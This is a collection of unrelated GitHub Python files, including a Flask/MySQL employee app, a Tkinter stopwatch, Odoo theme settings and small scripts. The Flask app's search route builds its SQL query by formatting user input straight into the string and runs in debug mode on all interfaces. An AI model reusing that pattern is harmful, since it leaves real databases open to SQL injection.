emp_image_file = request.files['emp_image_file']\n\n insert_sql = \"INSERT INTO employee VALUES (%s, %s, %s, %s, %s, %s, %s)\"\n cursor = db_conn.cursor()\n\n if emp_image_file.filename == \"\":\n return \"Please select a file\"\n\n try:\n\n cursor.execute(insert_sql, (emp_id, emp_name, emp_email, emp_bod, emp_bio, emp_job, emp_interest))\n db_conn.commit()\n # emp_name = \"\" + first_name + \" \" + last_name\n # Uplaod image file in S3 #\n emp_image_file_name_in_s3 = \"emp-id-\" + str(emp_id) + \"_image_file\"\n s3 = boto3.resource('s3')\n\n try:\n print(\"Data inserted in MySQL RDS... 
uploading image to S3...\")\n s3.Bucket(custombucket).put_object(Key=emp_image_file_name_in_s3, Body=emp_image_file)\n bucket_location = boto3.client('s3').get_bucket_location(Bucket=custombucket)\n s3_location = (bucket_location['LocationConstraint'])\n\n if s3_location is None:\n s3_location = ''\n else:\n s3_location = '-' + s3_location\n\n object_url = \"https://s3{0}.amazonaws.com/{1}/{2}\".format(\n s3_location,\n custombucket,\n emp_image_file_name_in_s3)\n\n except Exception as e:\n return str(e)\n\n finally:\n cursor.close()\n\n print(\"all modification done...\")\n return render_template('registerSuccess.html', name=emp_name)\n\n\n# register page - search employee button\n@app.route(\"/searchEmpButton\", methods=['POST'])\ndef search():\n return render_template('searchEmp.html')\n\n\n# register success page - back button\n@app.route(\"/registerSuccess\", methods=['POST'])\ndef back1():\n return render_template('registration.html')\n\n\n\n\n# search emp page - search emp function to search\n@app.route(\"/livesearch\", methods=[\"POST\", \"GET\"])\ndef livesearch():\n searchbox = request.form.get(\"text\")\n cursor = db_conn.cursor()\n query = \"select * from employee where emp_id LIKE '%{}%' OR emp_name LIKE '%{}%' \".format(searchbox, searchbox)#This is just example query , you should replace field names with yours\n cursor.execute(query)\n result = cursor.fetchall()\n return jsonify(result)\n\n\n# search emp page - back button\n@app.route(\"/backButton\", methods=['POST'])\ndef back2():\n return render_template('registration.html')\n\n\n\n\n# employee details page - show employee details\n@app.route(\"/empDetails\", methods=['POST'])\ndef back3():\n return render_template('')\n\n# employee details page - back button\n@app.route(\"/backToRegisterButton\", methods=['POST'])\ndef back():\n return render_template('registration.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, 
debug=True)\n","repo_name":"elenavanilla/aws-live","sub_path":"EmpAppAss.py","file_name":"EmpAppAss.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"376721837","text":"from mri.src.iomethods import load_documents, load_queries\nfrom mri.src.mri import IRM\nfrom mri.src.document import Document\nfrom typing import List, Tuple\n\n\nclass MriController:\n CISI = 'CISI'\n CRAN = 'CRAN'\n\n def _init_db(self, dataset: str):\n self._documents = load_documents(path='./mri/datasets/', dataset=self.CISI)\n self._queries = load_queries(path='./mri/datasets/', dataset=self.CISI)\n self.current_dataset = dataset\n self._model = IRM()\n for d in self._documents:\n self._model.add(d)\n\n def __init__(self, datasets: List[str] = None):\n self.datasets = [self.CISI, self.CRAN] if datasets is None else datasets\n self._model = None\n self._roccio_activated = False\n self._init_db(self.CISI)\n\n def change_dataset(self, name: str = CRAN):\n if name in self.datasets:\n self._init_db(name)\n return len(self._documents)\n return 0\n\n def execute_query(self, query: str) -> List[Document]:\n rank: List[Tuple[int, int]] = self._model.run_query(\n query, roccio=self._roccio_activated, top=5\n )\n return list(map(lambda e: (self._documents[e[0]]), rank))\n\n def get_document_json(self, id: str):\n for d in self._documents:\n if d.id == id:\n return d.toJson()\n return None\n\n def set_roccio(self, activated=True):\n self._roccio_activated = activated\n","repo_name":"tlr-team/srifinder_bot","sub_path":"src/mri_controller.py","file_name":"mri_controller.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28618566377","text":"with open(\"1_fuel_inputs.txt\", \"r\") as f:\n inputs = list(map(int, f.read().split()))\n\n\ndef mass_to_fuel(mass: int) -> int:\n \"\"\"Given the mass of an 
object, return the fuel requred to move that object.\"\"\"\n return mass // 3 - 2\n\n\nif __name__ == \"__main__\":\n print(sum(mass_to_fuel(x) for x in inputs))\n","repo_name":"fisher60/advent-of-code","sub_path":"2019/1_fuel_required.py","file_name":"1_fuel_required.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3523903293","text":"import os\nimport cv2\nimport numpy as np\nimport pickle\nfrom random import shuffle\n\n\ndef main():\n # Define parameters\n images_output_location = 'dataset/icons_dataset.npy'\n img_size = 32\n images_dir = 'dataset/LLD-icons-files/LLD_favicons_clean_png/'\n images = os.listdir(images_dir)\n\n # Define two lists - one for the images and one for the labels\n images_dataset = []\n\n # For each image in images_dir\n print('Loading images...')\n for curr_img in images:\n # Load it\n path = os.path.join(images_dir, curr_img)\n img = cv2.imread(path)\n # Append the image to the list of images\n images_dataset.append(img)\n print('Finished')\n\n # Transform the images_dataset list into numpy array\n print('Reshaping the images...')\n images_dataset = np.array(images_dataset).reshape(-1, img_size, img_size, 3)\n print('Finished')\n\n # Shuffle the images\n print('Shuffling the images...')\n shuffle(images_dataset)\n\n # Serialize the images\n print('Starting image serialization...')\n np.save(images_output_location, images_dataset)\n print('Finished')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rozver/Calliope","sub_path":"CalliopeAPI/preprocess_dataset.py","file_name":"preprocess_dataset.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"19704178153","text":"from tkinter import *\r\nfrom classes import *\r\n#from inves import *\r\nimport gspread\r\nfrom oauth2client.service_account import 
ServiceAccountCredentials\r\nimport time\r\nfrom pprint import pprint\r\n\r\nclass question:\r\n def __init__(self, answer, time, clock_time):\r\n self._time =time\r\n self._clock = clock_time\r\n self._answer = answer\r\n\r\n def get_time(self):\r\n return self._time\r\n def get_clock(self):\r\n return self._clock\r\n def get_answer(self):\r\n return self._answer\r\n\r\nscope = [\"https://spreadsheets.google.com/feeds\",'https://www.googleapis.com/auth/spreadsheets',\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"psycho-answers-db-2c81628245d3.json\", scope)\r\nclient = gspread.authorize(creds)\r\nsheet = client.open(\"psycho-answers\").sheet1\r\ndata = sheet.get_all_records()\r\n\r\nglobal count\r\nglobal optionvar_moed\r\nglobal optionvar_subject\r\nglobal optionvar_ch_num\r\ncount = False\r\n\r\nglobal q_num\r\nq_num = 1\r\n#פונקציות כתיבת זמנים בטבלה\r\ndef write_question_time(arg=0):\r\n global q_num\r\n current_text = str(t.get())\r\n globals()[\"q_clock_%s\"%q_num] = str(t.get())\r\n if q_num == 1:\r\n m, s = map(int, current_text.split(\":\"))\r\n m = int(m)\r\n s = int(s)\r\n if m < 10 :\r\n m = str(0) + str(m)\r\n else :\r\n m = str(m)\r\n if s < 10 :\r\n s = str(0) + str(s)\r\n else :\r\n s = str(s)\r\n current_text = m + \":\" + s\r\n q_times.append(current_text)\r\n q_clocks.append(current_text)\r\n globals()[\"lb_question_time_%s\"%q_num] = Label (root, text = current_text)\r\n globals()[\"lb_question_clock_%s\"%q_num] = Label (root, text = current_text)\r\n globals()[\"lb_question_time_%s\" % q_num].place(x =75, y=((q_num-1)*40)+242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x =140, y=((q_num-1)*40)+242)\r\n q_num += 1\r\n else:\r\n string_time = calculate_question_time(globals()[\"q_clock_%s\" %q_num], globals()[\"q_clock_%s\" %(q_num - 1)])\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=string_time)\r\n 
globals()[\"lb_question_clock_%s\"%q_num] = Label (root, text = current_text)\r\n q_times.append(string_time)\r\n q_clocks.append(current_text)\r\n if q_num <= 10 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=140, y=((q_num - 1) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=75, y=((q_num - 1) * 40) + 242)\r\n if q_num > 10 and q_num <= 20 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=335, y=((q_num - 11) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=272, y=((q_num - 11) * 40) + 242)\r\n if q_num > 20 and q_num <= 23 :\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=530, y=((q_num - 21) * 40) + 242)\r\n globals()[\"lb_question_clock_%s\" % q_num].place(x=462, y=((q_num - 21) * 40) + 242)\r\n q_num += 1\r\n time = q_clocks[q_num-2]\r\n clock_time = str(t.get())\r\ndef calculate_question_time(new_q, former_q):\r\n new_m, new_s = map(int, new_q.split(\":\"))\r\n new_m = int(new_m)\r\n new_s = int(new_s)\r\n former_m, former_s = map(int, former_q.split(\":\"))\r\n former_m = int(former_m)\r\n former_s = int(former_s)\r\n if (new_s-former_s) < 0:\r\n seconds = new_s + (60-former_s)\r\n minutes = new_m - (former_m + 1)\r\n else:\r\n seconds = new_s - former_s\r\n minutes = new_m - former_m\r\n if minutes < 10 :\r\n m = str(0) + str(minutes)\r\n else :\r\n m = str(minutes)\r\n if seconds < 10 :\r\n s = str(0) + str(seconds)\r\n else :\r\n s = str(seconds)\r\n globals()[\"q_time_%s\"%q_num] = \"{}:{}\".format(m,s)\r\n return \"{}:{}\".format(m,s)\r\n#פונקציות טיימר\r\ndef reset():\r\n global count\r\n global q_num\r\n global q_clocks\r\n global q_times\r\n q_clocks.clear()\r\n q_times.clear()\r\n q_clocks = [0]\r\n q_times = [0]\r\n count = True\r\n t.set(\"00:00\")\r\n q_num = 1 #משתנה שסופר את מספר השאלה עבור כל התוכנה. 
מתאפס בריסט וגדל ב-1 בגל question\r\n for i in range(1,24):\r\n if q_num <= 10 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=75, y=((q_num-1) * 40) + 242)\r\n if q_num > 10 and q_num <= 20 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x =270, y=((q_num-11)*40)+242)\r\n if q_num > 20 and q_num <= 23 :\r\n globals()[\"lb_question_time_%s\" %q_num] = Label(root, text=\" \")\r\n globals()[\"lb_question_time_%s\" %q_num].place(x=462, y=((q_num - 21) * 40) + 242)\r\n q_num += 1\r\n q_num = 1\r\ndef start(arg=0):\r\n global count\r\n count = False\r\n start_timer()\r\ndef start_timer():\r\n global count\r\n timer()\r\ndef stop(arg=0):\r\n global count\r\n count = True\r\ndef timer():\r\n global count\r\n if count == False:\r\n d = str (t.get())\r\n m, s = map(int, d.split(\":\"))\r\n m= int(m)\r\n s = int(s)\r\n if s < 59:\r\n s += 1\r\n elif s==59:\r\n s = 0\r\n if m < 59:\r\n m += 1\r\n elif m == 59:\r\n m = 0\r\n if m < 10:\r\n m = str(0) + str(m)\r\n else:\r\n m= str(m)\r\n if s < 10:\r\n s = str(0) + str(s)\r\n else:\r\n s= str(s)\r\n d =m+\":\"+s\r\n t.set(d)\r\n if count == False:\r\n root.after(1000, start_timer)\r\n#פונקציות GUI\r\ndef creat_root_tk():\r\n create_main_page_table()\r\n root.title(\"stop watch\")\r\n root.geometry(\"600x800\")\r\n root.resizable(False, False)\r\n root.bind(\"\", write_question_time)\r\n root.bind(\"\", stop)\r\n lb_stopwatch = Label(root, textvariable=t)\r\n lb_stopwatch.config(font=(\"Courier 40 bold\"))\r\n bt_start = Button(root, text=\"התחל\", command=start, font=(\"Aharoni 12\"), bg=\"honeydew3\", fg=\"white\")\r\n bt_stop = Button(root, text=\"עצור\", command=stop, font=(\"Aharoni 12 bold\"), bg=\"red\", fg=\"white\")\r\n bt_reset = Button(root, text=\"איפוס\", command=reset, font=(\"Aharoni 12 bold\"), bg=\"honeydew3\", fg=\"white\")\r\n lb_stopwatch.place(x=210, 
y=10)\r\n bt_start.place(x=150, y=100)\r\n bt_stop.place(x=265, y=100)\r\n bt_reset.place(x=390, y=100)\r\n bt_loop = Button(root, text=\"שאלה\", command=write_question_time, font=(\"Aharoni 12 bold\"), bg=\"grey\", fg=\"white\")\r\n bt_loop.place(x=260, y=136)\r\n lb_titles = Label(root,\r\n text=\"זמן זמן זמן זמן זמן זמן\")\r\n lb_titles.config(font=(\"Timesnewroman 8\"))\r\n lb_titles.place(x=80, y=193)\r\n lb_titles1 = Label(root,\r\n text=\"שאלה שעון שאלה שעון שאלה שעון\")\r\n lb_titles1.config(font=(\"Timesnewroman 8\"))\r\n lb_titles1.place(x=77, y=210)\r\n question_count_lb = 1\r\n question_count_lb_text = str(question_count_lb) + \".\"\r\n for i in range(1, 4) :\r\n for j in range(1, 11) :\r\n if question_count_lb < 24 :\r\n lb_question_number = Label(root, text=question_count_lb_text)\r\n lb_question_number.config(font=(\"Timesnewroman 14 bold\"))\r\n lb_question_number.place(x=180 * (i - 1) + 40, y=(j * 40) + 200)\r\n question_count_lb += 1\r\n question_count_lb_text = str(question_count_lb) + '.'\r\n bt_open_inves = Button(root, text = \"עבור לתחקור פרק\", command = create_inves_tk, bg = \"navyblue\", fg=\"white\")\r\n bt_open_inves.place (x=240, y=650)\r\ndef create_main_page_table():\r\n bt_canvas = Canvas(root, width = 600, height = 800)\r\n bt_canvas.pack()\r\n #יוצר את הקווים התחתונים מתחת לכותרת\r\n table = bt_canvas.create_line(76, 230, 102, 230)\r\n table = bt_canvas.create_line(140, 230, 171, 230)\r\n table = bt_canvas.create_line(272, 230, 301, 230)\r\n table = bt_canvas.create_line(335, 230, 371, 230)\r\n table = bt_canvas.create_line(462, 230, 492, 230)\r\n table = bt_canvas.create_line(530, 230, 562, 230)\r\n\r\n #יוצר את שלוש השורות הראשונות\r\n table = bt_canvas.create_line(33,275,575,275)\r\n table = bt_canvas.create_line(33, 315, 575, 315)\r\n table = bt_canvas.create_line(33, 355, 575, 355)\r\n #יוצר את השורות של כל שאר השורות\r\n for i in range(1, 8) :\r\n table = bt_canvas.create_line(33, 355+(40*i), 390, 355+(40*i))\r\n#דף 
תחקור\r\ndef create_inves_tk() :\r\n global optionvar_moed\r\n global optionvar_subject\r\n global optionvar_ch_num\r\n inves = Tk()\r\n scrollbar = Scrollbar(inves)\r\n scrollbar.pack(side=RIGHT, fill=Y)\r\n inves_canvas = Canvas(inves, width=600, height=300, yscrollcommand = scrollbar.set)\r\n inves_canvas.pack(anchor= \"nw\")\r\n inves.title(\"תחקור פרק\")\r\n inves.geometry(\"600x800\")\r\n inves.resizable(True, True)\r\n lb_koteret_inves = Label(inves, text=\"תחקור פרק\")\r\n lb_koteret_inves.config(font=\"Courier 32 bold underline\")\r\n lb_koteret_inves.place(x=160, y=7)\r\n answer_lines_count = 1\r\n inves_canvas.create_line(575, 115, 275, 115)\r\n inves_canvas.create_line(575, 115, 575, 266)\r\n lb_koteret_table_inves = Label(inves, text=\":נא מלא את התשובות בטבלה\")\r\n lb_koteret_table_inves.config(font=\"Gisha 11\")\r\n lb_koteret_table_inves.place(x=392, y=90)\r\n\r\n\r\n for i in range(1, 6) :\r\n inves_canvas.create_line(575, 115 + i * 30, 275, 115 + i * 30)\r\n inves_canvas.create_line(575 - i * 60, 115, 575 - i * 60, 266)\r\n for j in range(1, 6) :\r\n if answer_lines_count <= 23 :\r\n string = \":\" + str(answer_lines_count)\r\n lb_q_num_ans = Label(inves, text=string)\r\n lb_q_num_ans.place(x=550 - (i - 1) * 60, y=120 + (j - 1) * 30)\r\n globals()[\"entry_q_%s\" % answer_lines_count] = Entry(inves, width=2)\r\n globals()[\"entry_q_%s\" % answer_lines_count].place(x=530 - (i - 1) * 60, y=120 + (j - 1) * 30)\r\n answer_lines_count += 1\r\n globals()[\"entry_q_%s\" % answer_lines_count] = Entry(inves, width=2)\r\n globals()[\"entry_q_%s\" % answer_lines_count].place(x=600, y=700)\r\n \"\"\"\r\n for i in range(23):\r\n try:\r\n string = \"{} -{}\".format(q_times[i],str(i+1))\r\n lb_q_inves_times = Label(inves, text = string)\r\n lb_q_inves_times.place(x=550, y=(i+1)*20)\r\n except IndexError:\r\n break\r\n inves.mainloop()\r\n \"\"\"\r\n inves.bind(\"1\", focus_next_widget)\r\n inves.bind(\"2\", focus_next_widget)\r\n inves.bind(\"3\", 
focus_next_widget)\r\n inves.bind(\"4\", focus_next_widget)\r\n bt_clear_table = Button (inves, text = \"נקה טבלה\", font=(\"Aharoni 12 bold\"), command = clear_table_inves)\r\n bt_clear_table.place(x=200, y=240)\r\n Label(inves, text=\":ציין את מקור הפרק לתחקור\", font = \"Gisha 10\").place(x= 85, y=100)\r\n optionvar_moed = StringVar(inves)\r\n optionvar_moed.set(\"בחר מועד\")\r\n option_moed = OptionMenu(inves, optionvar_moed, \"דצמבר/חורף 19\", \"ספטמבר/סתיו 19\", \"יולי/קיץ 19\", \"אפריל/אביב 19\")\r\n option_moed.place(x=130, y=140, anchor = \"center\")\r\n optionvar_subject = StringVar(inves)\r\n optionvar_subject.set(\"בחר נושא פרק\")\r\n option_subject = OptionMenu(inves, optionvar_subject, \"כמותי\", \"מילולי\", \"אנגלית\")\r\n option_subject.place(x=130, y=170, anchor = \"center\")\r\n optionvar_ch_num = StringVar(inves)\r\n optionvar_ch_num.set(\"בחר מספר פרק\")\r\n option_ch_num = OptionMenu(inves, optionvar_ch_num, \"ראשון\", \"שני\")\r\n option_ch_num.place(x=130, y=200, anchor = \"center\")\r\n Button(inves, text = \"!התחל תחקור\", bg = \"lawn green\", font = \"Gisha 11 bold\", command = start_inves).place(x= 30, y= 240)\r\ndef focus_next_widget(event):\r\n if not entry_q_24.get():\r\n event.widget.tk_focusNext().focus()\r\n return(\"break\")\r\ndef clear_table_inves():\r\n for i in range (1,25):\r\n\r\n globals()[\"entry_q_%s\"%i].delete(0)\r\ndef start_inves():\r\n global optionvar_moed\r\n global optionvar_subject\r\n global optionvar_ch_num\r\n moed = optionvar_moed.get()\r\n subject = optionvar_subject.get()\r\n ch_num = optionvar_ch_num.get()\r\n for i in range(1,24):\r\n try:\r\n questions.append(question(globals()[\"entry_q_%s\" %i].get(), q_times[i], q_clocks[i]))\r\n except IndexError:\r\n break\r\n is_value_in_cell = True\r\n rows_count = 1\r\n while is_value_in_cell:\r\n if sheet.cell(rows_count,1) != 0:\r\n rows_count += 1\r\n else:\r\n is_value_in_cell = False\r\n print(rows_count)\r\nglobal q_clocks\r\nq_clocks = [0]\r\nglobal 
q_times\r\nq_times = [0]\r\nglobal questions\r\nquestions = [question(0,0,0)]\r\nq_num = 1\r\nroot = Tk()\r\nt = StringVar()\r\nt.set(\"00:00\")\r\ncreat_root_tk()\r\nroot.mainloop()\r\n","repo_name":"NadavKadosh/Study","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30440963374","text":"'''\nWritten By Ronel B. Llarenas\nGithub.com/llarenas\n'''\n\n#!/usr/bin/python\n# Mini ckient prgram\n# make sure nga ang misiserver.py is running\n\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK__STREAM)\ns.connect(('localhost', 8081))\ns.send('Happy Hacking')\ndata = s.recv(1024) #1024 bytes\ns.close()\nprint ('Received: ')\nprint (data)\n","repo_name":"llarenas/mini-Server-Client-in-Python","sub_path":"miniclient.py","file_name":"miniclient.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36094818821","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\nfrom odoo.modules.module import get_resource_path\nimport base64\nfrom odoo.tools.mimetypes import guess_mimetype\n\n\nclass AnitaUserSetting(models.TransientModel):\n '''\n anita user setting\n '''\n _inherit = 'res.config.settings'\n _inherits = {'anita_theme_setting.setting_base': 'setting_id'}\n\n setting_id = fields.Many2one(\n comodel_name=\"anita_theme_setting.setting_base\",\n required=True,\n ondelete=\"cascade\",\n string=\"setting id\")\n\n theme_setting_mode = fields.Selection(\n string=\"theme style mode\",\n selection=[('system', 'system'),\n ('company', 'company'),\n ('user', 'user')],\n default='system')\n\n allow_debug = fields.Boolean(string=\"allow debug\", default=False)\n\n window_default_title = fields.Char(string=\"login title\", default=\"Funenc\")\n powered_by = fields.Char(string=\"powered by\", 
default=\"Anita\")\n\n @api.model\n def get_theme_setting(self):\n '''\n get the theme setting, it is usefull when the mode is system\n :return:\n '''\n return self.get_theme_values()\n\n @api.model\n def get_theme_setting_mode(self):\n '''\n get theme setting mode\n :return:\n '''\n config = self.env['ir.config_parameter'].sudo()\n theme_setting_mode = config.get_param(\n key='anita_theme_setting.theme_setting_mode', default='system')\n return theme_setting_mode\n\n @api.model\n def get_values(self):\n '''\n get the vuales\n :return:\n '''\n res = super(AnitaUserSetting, self).get_values()\n theme_values = self.get_theme_values()\n # get the favicon\n res.update(theme_values)\n\n return res\n\n @api.model\n def get_theme_values(self):\n '''\n get the theme values\n :return:\n '''\n config = self.env['ir.config_parameter'].sudo()\n\n layout_mode = config.get_param(key='anita_theme_setting.layout_mode', default='Layout1')\n login_style = config.get_param(key='anita_theme_setting.login_style', default='login_style1')\n theme_setting_mode = config.get_param(key='anita_theme_setting.theme_setting_mode', default='system')\n current_theme_mode = config.get_param(key='anita_theme_setting.current_theme_mode', default=False)\n current_theme_style = config.get_param(key='anita_theme_setting.current_theme_style', default=False)\n dialog_pop_style = config.get_param(key=\"anita_theme_setting.dialog_pop_style\", default='normal')\n button_style = config.get_param(key=\"anita_theme_setting.button_style\", default='btn-style-normal')\n control_panel_mode = config.get_param(key=\"anita_theme_setting.control_panel_mode\", default='mode1')\n table_style = config.get_param(key=\"anita_theme_setting.table_style\", default='normal')\n font_name = config.get_param(key=\"anita_theme_setting.font_name\", default='Roboto')\n show_app_name = config.get_param(key=\"anita_theme_setting.show_app_name\", default=True)\n rtl_mode = config.get_param(key=\"anita_theme_setting.rtl_mode\", 
default=False)\n favorite_mode = config.get_param(key=\"anita_theme_setting.favorite_mode\", default=False)\n allow_debug = config.get_param(key=\"anita_theme_setting.allow_debug\", default=True)\n window_default_title = config.get_param(key=\"anita_theme_setting.allow_debug\", default=\"Awesome odoo\")\n powered_by = config.get_param(key=\"anita_theme_setting.powered_by\", default=\"Awesome odoo\")\n menu_icon_policy = config.get_param(\n key=\"anita_theme_setting.menu_icon_policy\", default=\"svg_icon\")\n\n tab_style = config.get_param(key=\"anita_theme_setting.tab_style\", default=\"normal\")\n icon_style = config.get_param(key=\"anita_theme_setting.icon_style\", default=\"normal\")\n \n return {\n \"layout_mode\": layout_mode,\n \"login_style\": login_style,\n \"theme_setting_mode\": theme_setting_mode,\n \"current_theme_mode\": int(current_theme_mode),\n \"current_theme_style\": int(current_theme_style),\n \"dialog_pop_style\": dialog_pop_style,\n \"button_style\": button_style,\n \"control_panel_mode\": control_panel_mode,\n \"table_style\": table_style,\n \"font_name\": font_name,\n \"show_app_name\": show_app_name,\n \"rtl_mode\": rtl_mode,\n \"favorite_mode\": favorite_mode,\n \"allow_debug\": allow_debug,\n \"window_default_title\": window_default_title,\n \"powered_by\": powered_by,\n \"menu_icon_policy\": menu_icon_policy,\n \"tab_style\": tab_style,\n \"icon_style\": icon_style,\n }\n\n def set_values(self):\n '''\n set values\n :return:\n '''\n super(AnitaUserSetting, self).set_values()\n\n ir_config = self.env['ir.config_parameter'].sudo()\n\n ir_config.set_param(\"anita_theme_setting.layout_mode\", self.layout_mode or \"Layout1\")\n ir_config.set_param(\"anita_theme_setting.login_style\", self.login_style or \"login_style1\")\n ir_config.set_param(\"anita_theme_setting.theme_setting_mode\", self.theme_setting_mode or 'system')\n ir_config.set_param(\"anita_theme_setting.current_theme_mode\", self.current_theme_mode.id or False)\n 
ir_config.set_param(\"anita_theme_setting.current_theme_style\", self.current_theme_style.id or False)\n ir_config.set_param(\"anita_theme_setting.dialog_pop_style\", self.dialog_pop_style or 'normal')\n ir_config.set_param(\"anita_theme_setting.button_style\", self.button_style or 'btn-style-normal')\n ir_config.set_param(\"anita_theme_setting.table_style\", self.table_style or 'normal')\n ir_config.set_param(\"anita_theme_setting.control_panel_mode\", self.control_panel_mode or 'normal')\n ir_config.set_param(\"anita_theme_setting.font_name\", self.font_name or 'Roboto')\n ir_config.set_param(\"anita_theme_setting.show_app_name\", self.show_app_name)\n ir_config.set_param(\"anita_theme_setting.rtl_mode\", self.rtl_mode)\n ir_config.set_param(\"anita_theme_setting.favorite_mode\", self.favorite_mode)\n ir_config.set_param(\"anita_theme_setting.allow_debug\", self.favorite_mode)\n\n ir_config.set_param(\"anita_theme_setting.window_default_title\", self.window_default_title)\n ir_config.set_param(\"anita_theme_setting.powered_by\", self.powered_by)\n\n ir_config.set_param(\"anita_theme_setting.menu_icon_policy\", self.menu_icon_policy)\n ir_config.set_param(\"anita_theme_setting.tab_style\", self.tab_style)\n ir_config.set_param(\"anita_theme_setting.icon_style\", self.icon_style)\n\n def set_values_company_favicon(self):\n '''\n set the favicon of company\n :return:\n '''\n company = self.sudo().env['res.company']\n records = company.search([])\n\n if len(records) > 0:\n for record in records:\n record.write({'favicon': self._set_web_favicon(original=True)})\n\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n }\n\n @api.model\n def get_login_style(self):\n '''\n get login style\n :return:\n '''\n ir_config = self.env['ir.config_parameter'].sudo()\n login_style = ir_config.get_param(\n key='anita_theme_setting.login_style', default='login_style1')\n return 
login_style\n","repo_name":"vjd8866/awesome_theme","sub_path":"anita_theme_setting/models/anita_res_setting.py","file_name":"anita_res_setting.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16719254449","text":"#!/usr/bin/python3\n\"\"\"script that factorize as many numbers as possible into a\n product of two smaller numbers\"\"\"\n\n\ndef descom_number(num):\n \"\"\"Extracts the first prime factor of the number, and displays the\n output formatted with the 2 respective factors.\n\n Args:\n num (int): the number that will be decomposed.\n Attributes:\n tmp (int): stores the number that will be decomposed so as not\n to lose the value.\n factor_primo: the number with which we will be dividing\n \"\"\"\n tmp = num\n factor_primo = 2\n\n while num > 1:\n if num % factor_primo == 0:\n num /= factor_primo\n print(f\"{tmp}={int(num)}*{factor_primo}\")\n break\n else:\n factor_primo += 1\n\n\nfile = open('tests/test00')\nlistlines = file.readlines()\n\nfor line in listlines:\n descom_number(int(line))\n","repo_name":"Dfunn1k/RSA-Factoring-Challenge","sub_path":"factors.py","file_name":"factors.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"1774281660","text":"from baskerville.features.updateable_features import UpdaterVariance\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Window\n\nfrom baskerville.features.feature_request_total import FeatureRequestTotal\nfrom baskerville.features.feature_request_interval_average import \\\n FeatureRequestIntervalAverage\nfrom baskerville.features.helpers import update_variance\n\n\nclass FeatureRequestIntervalVariance(UpdaterVariance):\n \"\"\"\n For each IP compute the variance of the time interval between subsequent\n requests (in minutes).\n \"\"\"\n DEFAULT_VALUE = 0.\n COLUMNS = ['@timestamp']\n 
DEPENDENCIES = [FeatureRequestTotal, FeatureRequestIntervalAverage]\n\n def __init__(self):\n super(FeatureRequestIntervalVariance, self).__init__()\n\n self.w = Window.partitionBy(\n F.col('client_request_host'), F.col('client_ip')\n ).orderBy(F.col(\"@timestamp\"))\n self.group_by_aggs = {\n 'request_interval_var': F.variance(\n F.col('request_interval').cast('float') / 60.\n ),\n }\n self.pre_group_by_calcs = {\n 'row_num_per_group':\n F.row_number().over(self.w),\n 'prev_ts': F.lag(F.col('@timestamp')).over(\n self.w),\n 'request_interval': F.when(\n F.col('row_num_per_group') > 1,\n F.when(\n F.isnull(\n F.col('@timestamp').cast('long') -\n F.col('prev_ts').cast('long')\n ), 0\n ).otherwise(\n F.col('@timestamp').cast('long') -\n F.col('prev_ts').cast('long')\n )).otherwise(None),\n }\n\n def compute(self, df):\n from pyspark.sql import functions as F\n\n df = df.withColumn(\n self.feature_name,\n F.when(\n F.isnan(F.col('request_interval_var')) |\n F.isnull(F.col('request_interval_var')),\n F.lit(self.feature_default).cast('float')\n ).otherwise(F.col('request_interval_var').cast('float'))\n ).fillna({self.feature_name: self.feature_default})\n return df\n\n @classmethod\n def update_row(cls, current, past, *args, **kwargs):\n return update_variance(\n past.get(cls.feature_name_from_class()),\n current[cls.feature_name_from_class()],\n past.get(FeatureRequestTotal.feature_name_from_class()),\n current[FeatureRequestTotal.feature_name_from_class()],\n past.get(FeatureRequestIntervalAverage.feature_name_from_class()),\n current[FeatureRequestIntervalAverage.feature_name_from_class()]\n )\n\n def update(self, df, feat_column='features', old_feat_column='old_features'):\n return super().update(\n df,\n self.feature_name,\n FeatureRequestTotal.feature_name_from_class(),\n FeatureRequestIntervalAverage.feature_name_from_class()\n 
